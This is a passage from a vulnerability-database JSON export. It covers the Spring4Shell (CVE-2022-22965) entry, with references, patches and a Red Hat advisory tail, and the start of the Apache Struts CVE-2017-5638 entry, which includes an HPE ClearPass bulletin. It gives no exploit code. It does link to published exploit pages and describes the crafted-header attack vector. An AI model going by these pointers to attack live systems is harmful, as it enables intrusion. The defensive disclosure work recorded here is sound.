Binding on JDK 9+\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-22965\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-003\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=rhdm\u0026version=7.12.1\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYlidHNzjgjWX9erEAQhBihAApV3yXc8aEuRq9fMKL4EnxKcmHt9dgnX2\n/Xsdp+isSEvWlE+TC/Ou0tptT1ZPfO3Adm/bXbsboaiq790W+aF8qHEYuA+WxtRW\nRY9cx4AS/QfRo+puk36QAWUSEx4WzKeU1no/5A7hezcPxIEGP+EdSX4DgDaVW9mB\nCZndXwiYAzLyYgVFI/y5AJP8CPZTvwFjdunOBDwqqNsKiVgFOjqHMJo/X+yus4bU\naFF0BAsA0OVCrjdnWV0fUqF1iON8cbELW7JqkGobM22PZZ6ngxzTXUTbvD1QovLM\nCbj2Ay7l7DHH/3v9Hqk7NLpzp/fa9Z/lQ5c+3okHu0QvanphRllsC893/KGGMXfa\n7+S3iWFKV2cJ2249z01eZgX30s7rlSlFRTB9hUlitWLiYaMkWWW0iqt0+2cPkjDv\nzP0hy1pYCyCFLluS85FVqW/9HBItNwReuXp9Vv3JqDy8L5+DIVv4WmSYcr4LCcj2\nEC5WsIjNW7G4dL0RCukt+HascGTD+huNbzsrDuln4vQJ2HG+4vmH7Cmmlr4MvpHD\nBw4BW6UI8a09axvbUVi2x+w1qTTdiO9J1x4ngaFKjbvItNpT3VRB3YfLcPck1Zv6\nDCEC2g11LdPnO2JR5M6t2eMsFlkfLDtqDFotVVzGLBXQWj7I5R2YK+OPrEF2dnXD\nPjhf0e6lKl4=xaz4\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22965"
},
{
"db": "CERT/CC",
"id": "VU#970766"
},
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"db": "PACKETSTORM",
"id": "166874"
},
{
"db": "PACKETSTORM",
"id": "166872"
},
{
"db": "PACKETSTORM",
"id": "166691"
},
{
"db": "PACKETSTORM",
"id": "166706"
},
{
"db": "PACKETSTORM",
"id": "166715"
},
{
"db": "PACKETSTORM",
"id": "166731"
},
{
"db": "PACKETSTORM",
"id": "166732"
}
],
"trust": 2.43
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-411825",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-411825"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-22965",
"trust": 3.9
},
{
"db": "CERT/CC",
"id": "VU#970766",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "166713",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "167011",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-254054",
"trust": 1.7
},
{
"db": "CS-HELP",
"id": "SB2022040109",
"trust": 1.2
},
{
"db": "CS-HELP",
"id": "SB2022033109",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "166874",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166691",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166732",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060811",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070602",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060716",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042734",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042546",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060304",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072038",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071213",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022052302",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042277",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072087",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041951",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042126",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3155",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5097",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1844",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1636",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1593",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1444.8",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1674",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-286-05",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-411825",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-22965",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166872",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166706",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166715",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166731",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#970766"
},
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"db": "PACKETSTORM",
"id": "166874"
},
{
"db": "PACKETSTORM",
"id": "166872"
},
{
"db": "PACKETSTORM",
"id": "166691"
},
{
"db": "PACKETSTORM",
"id": "166706"
},
{
"db": "PACKETSTORM",
"id": "166715"
},
{
"db": "PACKETSTORM",
"id": "166731"
},
{
"db": "PACKETSTORM",
"id": "166732"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"id": "VAR-202203-1506",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-411825"
}
],
"trust": 0.70416665
},
"last_update_date": "2025-11-21T21:36:38.238000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Spring Framework Fixes for code injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=187595"
},
{
"title": "Red Hat: Low: Red Hat Process Automation Manager 7.12.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221378 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat Decision Manager 7.12.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221379 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat AMQ Broker 7.9.4 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221627 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat Fuse 7.10.2 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221360 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat Integration Camel-K 1.6.5 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221333 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221306 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat AMQ Broker 7.8.6 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221626 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Cloud Pak for Business Automation is affected but not classified as vulnerable by a remote code execution in Spring Framework [CVE-2022-22965]",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e6cbc0e97f1832a63f66e10869253ecf"
},
{
"title": "Cisco: Vulnerability in Spring Framework Affecting Cisco Products: March 2022",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-java-spring-rce-Zx9GUc67"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/coffeehb/Spring4Shell "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.5,
"url": "https://tanzu.vmware.com/security/cve-2022-22965"
},
{
"trust": 2.9,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-java-spring-rce-zx9guc67"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/166713/spring4shell-code-execution.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/167011/spring4shell-spring-framework-class-property-remote-code-execution.html"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/security/cve/cve-2022-22965"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0005"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022040109"
},
{
"trust": 1.2,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022033109"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-22965"
},
{
"trust": 1.0,
"url": "https://www.kb.cert.org/vuls/id/970766"
},
{
"trust": 0.8,
"url": "cve-2022-22965 "
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-003"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22965"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1674"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072038"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1593"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042126"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-22965/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166874/red-hat-security-advisory-2022-1626-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041951"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042546"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060304"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166691/red-hat-security-advisory-2022-1306-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1844"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166732/red-hat-security-advisory-2022-1379-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070602"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071213"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072087"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060716"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042277"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1444.8"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042734"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060811"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5097"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-286-05"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3155"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1636"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022052302"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.8.6"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1626"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.9.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1306"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=red.hat.integration\u0026version=2022-q1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=red.hat.integration\u0026version"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.10.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1360"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=rhpam\u0026downloadtype=securitypatches\u0026version=7.12.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1378"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1379"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=rhdm\u0026version=7.12.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#970766"
},
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "PACKETSTORM",
"id": "166874"
},
{
"db": "PACKETSTORM",
"id": "166872"
},
{
"db": "PACKETSTORM",
"id": "166691"
},
{
"db": "PACKETSTORM",
"id": "166706"
},
{
"db": "PACKETSTORM",
"id": "166715"
},
{
"db": "PACKETSTORM",
"id": "166731"
},
{
"db": "PACKETSTORM",
"id": "166732"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#970766"
},
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"db": "PACKETSTORM",
"id": "166874"
},
{
"db": "PACKETSTORM",
"id": "166872"
},
{
"db": "PACKETSTORM",
"id": "166691"
},
{
"db": "PACKETSTORM",
"id": "166706"
},
{
"db": "PACKETSTORM",
"id": "166715"
},
{
"db": "PACKETSTORM",
"id": "166731"
},
{
"db": "PACKETSTORM",
"id": "166732"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-31T00:00:00",
"db": "CERT/CC",
"id": "VU#970766"
},
{
"date": "2022-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-411825"
},
{
"date": "2022-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"date": "2022-04-27T18:19:24",
"db": "PACKETSTORM",
"id": "166874"
},
{
"date": "2022-04-27T18:18:11",
"db": "PACKETSTORM",
"id": "166872"
},
{
"date": "2022-04-11T17:36:49",
"db": "PACKETSTORM",
"id": "166691"
},
{
"date": "2022-04-13T15:01:19",
"db": "PACKETSTORM",
"id": "166706"
},
{
"date": "2022-04-13T22:20:55",
"db": "PACKETSTORM",
"id": "166715"
},
{
"date": "2022-04-15T15:24:03",
"db": "PACKETSTORM",
"id": "166731"
},
{
"date": "2022-04-15T15:24:12",
"db": "PACKETSTORM",
"id": "166732"
},
{
"date": "2022-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"date": "2022-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"date": "2022-04-01T23:15:13.870000",
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-05-19T00:00:00",
"db": "CERT/CC",
"id": "VU#970766"
},
{
"date": "2023-02-09T00:00:00",
"db": "VULHUB",
"id": "VHN-411825"
},
{
"date": "2023-02-09T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"date": "2022-04-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"date": "2023-06-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"date": "2025-10-30T19:56:43.110000",
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "166691"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Spring Framework Code injection vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
}
],
"trust": 1.2
}
}
VAR-201703-0755
Vulnerability from variot - Updated: 2025-11-18 15:18The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. Apache Struts2 Contains a vulnerability that allows the execution of arbitrary code. Apache Struts2 In Jakarta Multipart parser A vulnerability exists in the execution of arbitrary code that could allow the execution of arbitrary code. The attack code for this vulnerability has been released.By processing a request crafted by a remote third party, arbitrary code could be executed with the privileges of the application. Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03723en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03723en_us Version: 1
HPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts, Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-03-29 Last Updated: 2017-03-29
Potential Security Impact: Remote: Code Execution
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified in HPE Aruba ClearPass Policy Manager.
Note: The ClearPass Policy Manager administrative Web interface is affected by the vulnerability. ClearPass Guest, Insight, and Graphite are NOT impacted.
- Aruba ClearPass Policy Manager All versions prior to 6.6.5
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2017-5638
9.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
9.7 (AV:N/AC:L/Au:N/C:C/I:C/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE Aruba has provided hotfixes for ClearPass 6.6.5, 6.6.4, and 6.5.7. Use one of the following methods to install the appropriate hotfix:
Install the Hotfix Online Using the Software Updates Portal:
-
Open ClearPass Policy Manager and go to Administration - Agents and Software Updates - Software Updates.
-
In the Firmware and Patch Updates area, find the "ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638" or "ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638" patch and click the Download button in its row.
-
Click Install.
-
When the installation is complete and the status is shown as "Needs Restart", proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change.
Installing the hotfix Offline Using the Patch File from support.arubanetworks.com:
-
Download the "ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638" or "ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638" patch from the Support site.
-
Open the ClearPass Policy Manager Admin UI and go to Administration - Agents and Software Updates - Software Updates.
-
At the bottom of the Firmware and Patch Updates area, click Import Updates and browse to the downloaded patch file. The name and description once imported may differ from the name and remark on the support site as these were adjusted after posting. This is purely a cosmetic discrepancy.
-
Click Install.
-
When the installation is complete and the status is shown as Needs Restart, proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change.
Workarounds
Restrict access to the Policy Manager Admin Web Interface. This can be accomplished by navigating to Administration - Server Manager - Server Configuration - Server-Name - Network - Restrict Access and only allowing non-public or network management networks.
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 29 March 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQEcBAEBCAAGBQJY3BR/AAoJELXhAxt7SZaiMW8H/0+jWL4Evk+KeqP7aYk1msGp 9ih3F2680VrHVsUbSzul3+svnaWTJUgRe7fUTvsh/Q6bx/Eo86yo8iXGjmzETLtY cTuQrHLySo55Pwua9+89V4e13QkRvQ/UmQPYDMPEk9L7wwU9OF0oCpXHQBuWnw07 mKLZ12HaZqM8vJXgwgJFH77Mf3r5TkGFHsrZ0M+2vvxioJIEfmWV/x4eqtvIy6zS C6CX1M9x4xD442XcFfnH0BHA9RL6LOeYngTPYR7IIycvzpqd8kOWunjs38+IJpFR g49ho/NddeZfDKdJcIdfJ+0f3x2h7FPiVadXu1PzdCckhFHkHmrSlVcRbQZ+1R8= =8ljI -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-0755",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "apache struts",
"version": null
},
{
"model": "struts",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.2.3"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.2.0"
},
